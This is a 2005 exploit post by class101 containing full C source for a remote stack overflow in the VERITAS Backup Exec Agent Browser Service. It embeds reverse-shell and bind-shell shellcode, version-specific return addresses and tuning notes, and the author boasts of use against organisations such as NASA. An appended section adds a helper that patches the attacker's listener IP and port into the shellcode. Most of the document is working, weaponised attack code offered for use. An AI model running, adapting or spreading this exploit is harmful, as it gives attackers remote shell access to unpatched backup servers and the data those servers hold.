Because k-otik are poor losers not respecting the publication of Metasploit 2.3, I'm forced to post my code.

/*
VERITAS Backup Exec v9.1.4691.SP1
                    v9.1.4691.SP0
                    v8.5.3572
Agent Browser Service, Remote Stack Overflow

Highly Critical

All credits to:

-iDEFENSE (discovery, www.iDEFENSE.com),
-Thor Doomen (IAT/syscall method, iat-syscall[at]inbox.lv),
-H.D. Moore (scode, www.metasploit.com),
-Matt Miller (scode, www.hick.org)

ExtraNotes:

All my tests/debugs were a bit long (some days), firstly due to the big size
of Backup Exec and the instability across different Windows versions
to make that IAT method work with 100% success, and the difficulty to debug it.
(As a recall, due to the only 60 bytes free, a tiny shellcode is sent first to scan
the recv function of benetns.exe and jump to the data submitted during the second send,
thanks syscall.) Let's think large now. Imagine that you exploit the hole and you submit
the shellcode 5 minutes later: the service will hang to death of course until a kill.
Now imagine that you exploit the hole and you submit the shellcode too fast for the
computer processing: the shellcode can be missed, won't be executed again, sometimes yes/no, but really unstable.
Hopefully (or unfortunately for you, admin :>) I'm here to optimize it and make it 100% working, universal,
stable, whatever you want, for the good fortune of script kiddies and to show what working means to my good
friends ka-odick :>

                                            Tries
      Machine                        Bind / Reverse / Success

 (2x) Win2k SP4    Server English     10       10        20
 (1x) Win2k SP4    Pro    English      5        5        10
 (1x) WinXP SP1    Pro    English      5        5        10
 (1x) WinXP SP1a   Pro    English      5        5        10
 (3x) Win2003 SP0  Server English      5        5        10
 (1x) Win2003 SP0  Server Ita.         5        5        10
 (1x) NT4          Server English.     5        5        10

                                     = Universal

v0.1:
C code based on Thor Doomen's code posted at the Metasploit mailing list,
excellent in the method, but super unstable, not to say not working, when used;
made some changes.

v0.2:
Fix of the first big problem, the missed shellcode across different Windows versions,
fixed by flooding benetns with more sends, timer really small, this is important.
Padding 1 NOP to the reverse shellcode as needed, else crash on reverse.

v0.3:
Universal esi call across v9.1 SP0 and SP1, for the good fortune of script kiddies.

v0.4:
As a warning, this PoC v0.4 has been tested working by an anonymous tester (never mentioned here)
on some organisations such as NASA, states/edus; it's urgent to update, 1 month after the advisory, sleepers.

Tips: -make sure that your IP is free of null bytes in reverse mode.
      -make sure that you target the right version of Backup Exec,
       else you crash it.
      -Backup Exec v10.0 is now available, get it at www.veritas.com.
      -Visit dfind.kd-team.com for a patched benetns.exe, quick solution
       for an urgent update (extracted from the hotfix at www.veritas.com).
       Backup Exec 9.x is tested safe after replacing the .exe.

Greetings:
   Nima Majidi
   Behrang Fouladi
   Pejman
   keystr0ke
   JGS
   DiabloHorn
   kimatrix
   NaV
   New Metasploit v2.3 (http://www.metasploit.com/)
   and all idlers of #n3ws on Eris Free Network.

by class101 [at] hat-squad.com
answering to all stupid questions that I got & will have: no, I'm not Persian, and you don't care where I come from.

04 January 2005
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <time.h>
#ifdef WIN32
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
#else
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <fcntl.h>
/* Sleep() takes milliseconds on Win32; map it onto usleep() so the
   inter-send delays are the same on both platforms (the original
   Sleep(1/100) was integer division and slept 0 seconds). */
#define Sleep(ms)      usleep((ms) * 1000)
#define SOCKET         int
#define closesocket(s) close(s)
#endif

/* Matt Miller's 'skape' shellcode: connect-back cmd.exe (reverse mode). */
char scode1[] =
// pad needed there for me, if you get scode detection problems on slow connections,
// try to add more NOP and make sure to update the memcpys later in the code.
"\x90"
"\xeb\x6e\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0d\x56\x8b\x40\x0c\x8b\x70\x1c\xad"
"\x8b\x40\x08\x5e\xc3\x8b\x40\x34\x83\xc0\x7c\x8b\x40\x3c\xc3\x60\x8b\x6c\x24\x24"
"\x8b\x45\x3c\x8b\x7c\x05\x78\x03\xfd\x8b\x4f\x18\x8b\x5f\x20\x03\xdd\xe3\x33\x49"
"\x8b\x34\x8b\x03\xf5\x33\xc0\x99\xfc\xac\x84\xc0\x74\x07\xc1\xca\x0d\x03\xd0\xeb"
"\xf4\x3b\x54\x24\x28\x75\xe2\x8b\x5f\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5f\x1c\x03"
"\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c\x61\xc3\xeb\x35\xad\x50\x52\xe8\xa9\xff"
"\xff\xff\x89\x07\x83\xc4\x08\x83\xc7\x04\x3b\xf1\x75\xec\xc3\x8e\x4e\x0e\xec\x72"
"\xfe\xb3\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\xd9\x09\xf5\xad\xec\xf9\xaa\x60\xcb"
"\xed\xfc\x3b\xe7\x79\xc6\x79\x83\xec\x60\x8b\xec\xeb\x02\xeb\x05\xe8\xf9\xff\xff"
"\xff\x5e\xe8\x47\xff\xff\xff\x8b\xd0\x83\xee\x2e\x8d\x7d\x04\x8b\xce\x83\xc1\x10"
"\xe8\xa5\xff\xff\xff\x83\xc1\x10\x33\xc0\x66\xb8\x33\x32\x50\x68\x77\x73\x32\x5f"
"\x8b\xdc\x51\x52\x53\xff\x55\x04\x5a\x59\x8b\xd0\xe8\x85\xff\xff\xff\xb8\x01\x63"
"\x6d\x64\xc1\xf8\x08\x50\x89\x65\x30\x33\xc0\x66\xb8\x90\x01\x2b\xe0\x54\x83\xc0"
"\x72\x50\xff\x55\x1c\x33\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x14\x8b\xf0"
"\x68\x7f\x01\x01\x01\xb8\x02\x01\x11\x5c\xfe\xcc\x50\x8b\xdc\x33\xc0\xb0\x10\x50"
"\x53\x56\xff\x55\x18\x33\xc9\xb1\x54\x2b\xe1\x8b\xfc\x57\x33\xc0\xf3\xaa\x5f\xc6"
"\x07\x44\xfe\x47\x2d\x57\x8b\xc6\x8d\x7f\x38\xab\xab\xab\x5f\x33\xc0\x8d\x77\x44"
"\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50\xff\x75\x30\x50\xff\x55\x08\xf7\xd0\x50"
"\xff\x36\xff\x55\x10\xff\x77\x38\xff\x55\x20\xff\x55\x0c\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";

/* H.D. Moore's shellcode: XOR-0x88 encoded bind cmd.exe on port 101 (bind mode). */
char scode2[] =
// "\x90" uncomment this if you have scode detection problem on slow connections or try more NOP,
// but for me and some other guys it's already fine like this.
"\xEB"
"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
"\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D"
"\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9"
"\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
"\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89"
"\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03\x91\x03"
"\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\x77\x5E\x01\x4F"
"\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\xAF\x88\x88\x88\x18\x89\x88\x88"
"\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25\xA6\x61"
"\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3\xA8\xD9"
"\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\x77\xDD\x8C"
"\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
"\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\xDB\xE0\x8A\x88\x88\xED\x01\x68"
"\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8\x01\x4F"
"\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1\x7B\x23"
"\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4\x89\x89"
"\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
"\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xFA\x76\x3B\x9E\x77\xDD\x8C\x77"
"\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77\x77\x77"
"\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53\xDB\x77"
"\x58\x68\x61\x63\x6B\x90";

static char payload[800];

/* Version-specific values patched into talk[] below. The first pair is the
   recv() IAT slot in benetns.exe (the stub does shr eax,8, so the 0xFF filler
   byte drops out and eax becomes 0x00401150 / 0x00401138 without a null in
   the packet); the second pair is the return address, a 'call esi' gadget
   that is universal across v9.1 SP0 and SP1 (v0.3). */
char v91sp0sp1[] = "\xFF\x50\x11\x40";
char esisp0sp1[] = "\xA1\xFF\x42\x01";
char v85[]       = "\xFF\x38\x11\x40";
char esiold[]    = "\xB9\x08\x43\x01";

/* First send: the request that overflows the stack, carrying the tiny stub
   that fits in the 60 free bytes. The stub aligns esp, then counts esi down
   and calls recv(esi, edi, 0x10000, 0) through the IAT until a call returns
   >= 0, and finally does jmp edi into whatever the second send delivered. */
char talk[] =
"\x02\x00\x32\x00"
"\x90\x90\x90\x90"
"\x31\xF6\xC1\xEC\x0C\xC1\xE4\x0C\x89\xE7\x89\xFB\x6A\x01\x8B\x74"
"\x24\xFE\x31\xD2\x52\x42\xC1\xE2\x10\x52\x57\x56\xB8\x00\x00\x00"   /* B8 at talk[36]: imm32 patched at talk[37] */
"\x00\xC1\xE8\x08\xFF\x10\x85\xC0\x79\x07\x89\xDC\x4E\x85\xF6\x75"
"\xE1\xFF\xE7\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"   /* return address patched at talk[72] */
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x00"
"1.1.1.1.1.1"
"\x00"
"\xEB\x80";   /* jmp short -0x80: lands in the NOP sled at talk[6], in front of the stub */

#ifdef WIN32
WSADATA wsadata;
#endif

void ver(void);
void usage(char *us);

int main(int argc, char *argv[])
{
    unsigned int   gip   = 0;   /* reverse-shell IP, network byte order   */
    unsigned short gport = 0;   /* reverse-shell port, network byte order */
    char *os;
    int port, i;
    SOCKET s;
    fd_set mask;
    struct timeval timeout;
    struct sockaddr_in server;

    ver();
    if (argc > 6 || argc < 3 || atoi(argv[1]) > 2 || atoi(argv[1]) < 1) { usage(argv[0]); return -1; }
    if (argc == 5) { usage(argv[0]); return -1; }
    if (strlen(argv[2]) < 7) { usage(argv[0]); return -1; }
    if (argc == 6 && strlen(argv[4]) < 7) { usage(argv[0]); return -1; }
#ifdef WIN32
    if (WSAStartup(MAKEWORD(2, 0), &wsadata) != 0) { printf("[+] wsastartup error\n"); return -1; }
#endif
    if (argc == 6) {
        gip   = inet_addr(argv[4]);
        gport = htons((unsigned short)atoi(argv[5]));
    }
    port = (argc == 4 || argc == 6) ? atoi(argv[3]) : 6101;   /* Agent Browser default port */

    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s == -1) { printf("[+] socket() error\n"); return -1; }

    /* Patch the version-specific recv() IAT slot and return address into the stub. */
    if (atoi(argv[1]) == 1) {
        memcpy(&talk[37], v91sp0sp1, 4);
        memcpy(&talk[72], esisp0sp1, 4);
        os = "Backup Exec v9.1.4691.1\n[+]            Backup Exec v9.1.4691.0";
    } else {
        memcpy(&talk[37], v85, 4);
        memcpy(&talk[72], esiold, 4);
        os = "Backup Exec v8.5.3572";
    }

    /* Second stage: reverse shell if a listener was given, bind shell otherwise.
       payload is assembled with strcat()/strlen(), so a null byte in the IP or
       port truncates it (hence the tip above). */
    if (argc == 6) {
        memcpy(&scode1[282], &gip, 4);     /* operand of push 0x0101017f (127.1.1.1 placeholder) */
        memcpy(&scode1[289], &gport, 2);   /* port bytes of mov eax,0x5c110102 (4444 placeholder) */
        strcat(payload, scode1);
    } else {
        strcat(payload, scode2);
    }
    printf("[+] target(s): %s\n", os);

    server.sin_family      = AF_INET;
    server.sin_addr.s_addr = inet_addr(argv[2]);
    server.sin_port        = htons((unsigned short)port);
    if (connect(s, (struct sockaddr *)&server, sizeof(server)) == -1) {
        printf("[+] connect() error\n"); closesocket(s); return -1;
    }
    timeout.tv_sec = 3; timeout.tv_usec = 0;
    FD_ZERO(&mask); FD_SET(s, &mask);
    switch (select(s + 1, NULL, &mask, NULL, &timeout)) {
    case -1: printf("[+] select() error\n");  closesocket(s); return -1;
    case 0:  printf("[+] connect() error\n"); closesocket(s); return -1;
    default:
        if (FD_ISSET(s, &mask)) {
            printf("[+] connected, constructing the payload...\n");
            if (send(s, talk, sizeof(talk) - 1, 0) == -1) {
                printf("[+] sending error 1, the server probably rebooted.\n"); closesocket(s); return -1;
            }
            Sleep(10);
            /* Flood the stub with the payload (v0.2): seven sends with a very
               short timer, so the recv() loop in the stub cannot miss it. */
            for (i = 2; i <= 8; i++) {
                if (send(s, payload, strlen(payload), 0) == -1) {
                    printf("[+] sending error %d, the server is patched.\n", i); closesocket(s); return -1;
                }
                Sleep(i < 8 ? 10 : 1000);
            }
            printf("[+] size of payload: %lu\n", (unsigned long)((sizeof(talk) - 1) + strlen(payload) * 7));
            printf("[+] payload sent.\n");
        }
    }
    closesocket(s);
#ifdef WIN32
    WSACleanup();
#endif
    return 0;
}

void usage(char *us)
{
    printf("USAGE:\n");
    printf("      [+]  . %s Version VulnIP\n", us);
    printf("      [+]  . %s Version VulnIP VulnPORT\n", us);
    printf("      [+]  . %s Version VulnIP VulnPORT ListenIP ListenPORT\n", us);
    printf("VERSION:\n");
    printf("      [+] 1. Backup Exec v9.1.4691.SP1\n");
    printf("      [+] 1. Backup Exec v9.1.4691.SP0\n");
    printf("      [+] 2. Backup Exec v8.5.3572\n");
    printf("TARGET:\n");
    printf("      [+]  . 2k3/2k/XP/NT4 universal (*)\n");
    printf("NOTE:\n");
    printf("      The exploit binds a cmdshell on port 101 or\n");
    printf("      reverses a cmdshell to your listener.\n");
    printf("      A wildcard (*) means tested working.\n");
    printf("      Compilation: msvc6, cygwin, Linux.\n");
}

void ver(void)
{
    printf("\n");
    printf("        ================================================[0.4]========\n");
    printf("        =================VERITAS Backup Exec 8.x/9.x=================\n");
    printf("        =========Agent Browser Service, Remote Stack Overflow========\n");
    printf("        ======coded by class101=============[Hat-Squad.com 2005]=====\n");
    printf("        =============================================================\n");
    printf("\n");
}

-------------------------------------------------------------
class101
Hat-Squad.com
-------------------------------------------------------------
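Added example (mine, not part of class101's post or of the exploit above). The post hard-codes the reverse-shell target at scode1 offsets 282 and 289, warns that those memcpys must be updated whenever NOPs are added, and warns that the listener IP must be free of null bytes. The check below locates the target placeholder by its instruction bytes (push 0x0101017f / mov eax,0x5c110102 / dec ah, which is what sits at those offsets in scode1) instead of by fixed offset, requires it to occur exactly once, and refuses to patch when the result would contain a 0x00, because the post's payload is assembled with strcat()/strlen() and would be truncated there. The sample buffer is constructed here to reproduce only the layout; it is not the shellcode, and the helper names are my own.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>

/* The target placeholder as it appears in the connect-back stub:
 *   68 7f 01 01 01      push 0x0101017f      ; 127.1.1.1 in network order
 *   b8 02 01 11 5c      mov  eax, 0x5c110102 ; port 0x115c = 4444
 *   fe cc               dec  ah              ; 0x0102 -> 0x0002 = AF_INET
 */
static const unsigned char PLACEHOLDER[] = {
    0x68, 0x7f, 0x01, 0x01, 0x01,
    0xb8, 0x02, 0x01, 0x11, 0x5c,
    0xfe, 0xcc
};
#define PH_IP_OFF   1   /* the 4 IP bytes inside PLACEHOLDER   */
#define PH_PORT_OFF 8   /* the 2 port bytes inside PLACEHOLDER */

/* Offset of the placeholder in buf, or -1 if it is absent or not unique. */
long find_placeholder(const unsigned char *buf, size_t len)
{
    long found = -1;
    size_t i;
    for (i = 0; i + sizeof PLACEHOLDER <= len; i++) {
        if (memcmp(buf + i, PLACEHOLDER, sizeof PLACEHOLDER) == 0) {
            if (found != -1) return -1;   /* two copies: offsets would be ambiguous */
            found = (long)i;
        }
    }
    return found;
}

/* Network-order IPv4 address / port built byte by byte (no socket headers needed). */
uint32_t ip_be(unsigned a, unsigned b, unsigned c, unsigned d)
{
    unsigned char o[4] = { (unsigned char)a, (unsigned char)b, (unsigned char)c, (unsigned char)d };
    uint32_t v;
    memcpy(&v, o, 4);
    return v;
}
uint16_t port_be(unsigned p)
{
    unsigned char o[2] = { (unsigned char)(p >> 8), (unsigned char)(p & 0xff) };
    uint16_t v;
    memcpy(&v, o, 2);
    return v;
}

/* 1 if any byte that would be written into the stub is 0x00. */
int target_has_nul(uint32_t ip, uint16_t port)
{
    unsigned char b[6];
    memcpy(b, &ip, 4);
    memcpy(b + 4, &port, 2);
    return memchr(b, 0, sizeof b) != NULL;
}

/* Patch ip/port (network order) into the stub. Returns the placeholder offset
 * on success, -1 if it is not found exactly once, -2 if the target contains a
 * NUL; the buffer is left untouched in both failure cases. */
long patch_reverse_target(unsigned char *buf, size_t len, uint32_t ip, uint16_t port)
{
    long off = find_placeholder(buf, len);
    if (off < 0) return -1;
    if (target_has_nul(ip, port)) return -2;
    memcpy(buf + off + PH_IP_OFF, &ip, 4);
    memcpy(buf + off + PH_PORT_OFF, &port, 2);
    return off;
}

/* Constructed stand-in for scode1 (not shellcode): 281 filler bytes, the
 * placeholder, 20 more filler bytes, so the IP lands at offset 282 and the
 * port at 289, exactly where the post's memcpy calls write. */
static unsigned char sample[512];
static size_t sample_len;

size_t sample_init(void)
{
    memset(sample, 0x90, 281);
    memcpy(sample + 281, PLACEHOLDER, sizeof PLACEHOLDER);
    memset(sample + 281 + sizeof PLACEHOLDER, 0x90, 20);
    sample_len = 281 + sizeof PLACEHOLDER + 20;
    return sample_len;
}
long sample_find(void) { return find_placeholder(sample, sample_len); }
long sample_patch(uint32_t ip, uint16_t port) { return patch_reverse_target(sample, sample_len, ip, port); }
int  sample_byte(size_t i) { return i < sample_len ? sample[i] : -1; }

int main(void)
{
    sample_init();
    printf("placeholder at offset %ld (the post's memcpys use 282/289)\n", sample_find());
    printf("10.0.0.1:4444     -> %ld (refused: NUL in target)\n", sample_patch(ip_be(10, 0, 0, 1), port_be(4444)));
    printf("192.168.1.10:4444 -> %ld (patched)\n", sample_patch(ip_be(192, 168, 1, 10), port_be(4444)));
    return 0;
}
```

With the real scode1 in place of the sample, find_placeholder() returns 281 only while the leading "\x90" pad is exactly one byte; adding NOPs moves it, which is the case the post tells you to fix by hand.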